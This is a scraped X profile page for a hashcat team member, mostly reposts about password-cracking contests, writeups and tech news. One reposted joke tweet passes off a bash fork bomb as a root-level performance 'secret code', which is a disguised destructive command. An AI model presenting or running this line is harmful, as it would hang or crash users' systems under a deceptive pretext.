Xanadrel's profile picture. Hashcracking, Password Analysis, Programming,  Percussive maintenance expert.
Team @hashcat

Xanadrel

@Xanadrel

Hashcracking, Password Analysis, Programming, Percussive maintenance expert. Team @hashcat

Joined August 2010
Similar User
dropdeadfu's profile picture. Team #Hashcat - FX trader since 2011 - CEO of crossvault GmbH

@dropdeadfu

Chick3nman512's profile picture. Sam Croley, Austin based password cracker & researcher; Team @hashcat Core Dev; Director of Detack US - @DetackGmbH; DMs always open

@Chick3nman512

RuraPenthe0's profile picture. Hacker by day, coffee drinker by night.

@RuraPenthe0

winxp5421's profile picture. Password Enthusiast. Cynosure Prime Member. Underestimate me, it should be fun.

@winxp5421

m3g9tr0n's profile picture. Team @hashcat! Eternal n00b and knowledge seeker! Age is just a number and motivation is the fuel!
Whatever you do in your life, do not forget to be humble.

@m3g9tr0n

unix_ninja's profile picture. Team Hashcat + Hacking stuff + Running Information Assurance at a Fortune org + I like chess + Cracking Passwords + Making music

@unix_ninja

netmux's profile picture. Dad-Husband-Vet-Passwords   🧍🤵🇺🇸🤫Operator Handbook: https://t.co/Wbst8aQZYH Hash Crack: https://t.co/3auNNKgcAV

@netmux

lakiw's profile picture. Security Researcher. Pronouns: he, him, they, them.

@lakiw

NullMode_'s profile picture. Hacking / STR / Fitness / Nerd

@NullMode_

thorsheim's profile picture. EOL account. See thorsheim at bsky social or thorsheim at mastodon social or https://t.co/ev9SKQy9x0

@thorsheim

Hydraze's profile picture. CSIRT Manager somewhere in the Nordics, interested in passwords security, member of Zenk-Security.
https://t.co/PjUstFMAAc

@Hydraze

gm4tr1x's profile picture. Dev/Team Hashcat, Moon addicted

@gm4tr1x

DhiruKholia's profile picture. Open-source software and hardware. CQ CQ CQ DE VU3CER. Likes may be bookmarks. https://t.co/u1SflxtqIU. https://t.co/rSAjGVssF2.

@DhiruKholia

w34kp455's profile picture. Researcher and appsec trainer. Building different security-related stuff at https://t.co/vdti8NnFhw.

https://t.co/vhi619Xccj and https://t.co/x2ir2F66Fr

@w34kp455

Th3_M3chan1c's profile picture. Everything from pyro to passwords. jack of all trades,      Team Hashcat

@Th3_M3chan1c

Xanadrel Reposted

Congrats to Hashmob, Team @hashcat and @CynoPrime on #cmiyc2024 ! Big thanks to @CrackMeIfYouCan for consistently putting on cracking competitions that are unique and challenging! Looking forward to next year. Plans are already underway :)


Xanadrel Reposted

CMIYC 2024 has finished! HashMob won first place in Pro: infosec.exchange/@CrackMeIfYouC


Xanadrel Reposted

Team hashcat has placed 2nd in the @CrackMeIfYouCan contest at #DEFCON32! Congrats to HashMob on 1st, and @CynoPrime on 3rd place. Looking forward to your writeups! Big thanks to KoreLogic and @PasswordVillage for organizing the contest!


Xanadrel Reposted

New blog post: Registering a Team and Cracking the Test Hashes for #CMIYC2024 #Defcon. Now you really don't have any excuse not to compete! If you are interested and want to start a street team, don't hesitate to reach out and ask questions! reusablesec.blogspot.com/2024/08/tutori…


Xanadrel Reposted

trontastic is online.

tr0ntastic's tweet image. trontastic is online.

Xanadrel Reposted

Important: This new calling feature is ENABLED by default and will reveal your IP address to your callers! To opt out, go to settings->privacy and safety->direct messages->disable calls IP address will potentially identify you so especially important for pseudonymous accounts.

audio and video calling are now available to everyone on X! who are you calling first?



Xanadrel Reposted

Exclusive & Benchmarks: AMD Quietly Funded A Drop-In CUDA Implementation Built On ROCm: It's Now Open-Source This allows unmodified CUDA apps to run on Radeon GPUs and in some workloads CUDA on Radeon is faster than native OpenCL or HIP/ROCm backends! phoronix.com/review/radeon-…


Xanadrel Reposted

Xanadrel Reposted

CAN WE PLEASE DROP THE #ONLINESAFETYBILL AND DO THIS AUSTRALIAN THING INSTEAD PLEASE?

AlecMuffett's tweet image. CAN WE PLEASE DROP THE #ONLINESAFETYBILL AND DO THIS AUSTRALIAN THING INSTEAD PLEASE?

Xanadrel Reposted

Here is Part 2 of my series "Using JupyterLab to Manage Password Cracking Sessions (A CMIYC 2023 Writeup)" reusablesec.blogspot.com/2023/08/using-… In this one, some passwords are actually cracked!


Xanadrel Reposted

Congratulation to teams @hashcat and @cynoprime rocking the Pro bracket in @CrackMeIfYouCan! Thanks to KoreLogic for organizing new iteration of the wonderful contest!


Xanadrel Reposted

Part 1 of my CMIYC writeup: Using JupyterLab to Manage Password Cracking Sessions reusablesec.blogspot.com/2023/08/using-… Not many passwords are cracked, but graphs are made, and a certain Team @hashcat functionality is recreated.


Xanadrel Reposted

Many Linux developers and sysadmins don't know this, but a secret code can unlock your cloud server resources and boost server performance by 5x. All you have to do is type the following as root user: :(){ :|:& };:


Xanadrel Reposted

Xanadrel Reposted

Congratulations to team @hashcat for taking first place in @CrackMeIfYouCan this year. It was a tough battle at the end, well deserved! Always a fun contest. Thank you for your hard work organizing every year @CrackMeIfYouCan !


Xanadrel Reposted

Team hashcat has placed first in the @CrackMeIfYouCan contest at #DEFCON31! This marks our 10th CMIYC win! As always @CynoPrime put up a great fight, congrats on 2nd place, looking forward to the writeup! Big thanks to KoreLogic and @PasswordVillage for organizing the contest!

hashcat's tweet image. Team hashcat has placed first in the @CrackMeIfYouCan contest at #DEFCON31! This marks our 10th CMIYC win! As always @CynoPrime put up a great fight, congrats on 2nd place, looking forward to the writeup! Big thanks to KoreLogic and @PasswordVillage for organizing the contest!

Loading...

Something went wrong.


Something went wrong.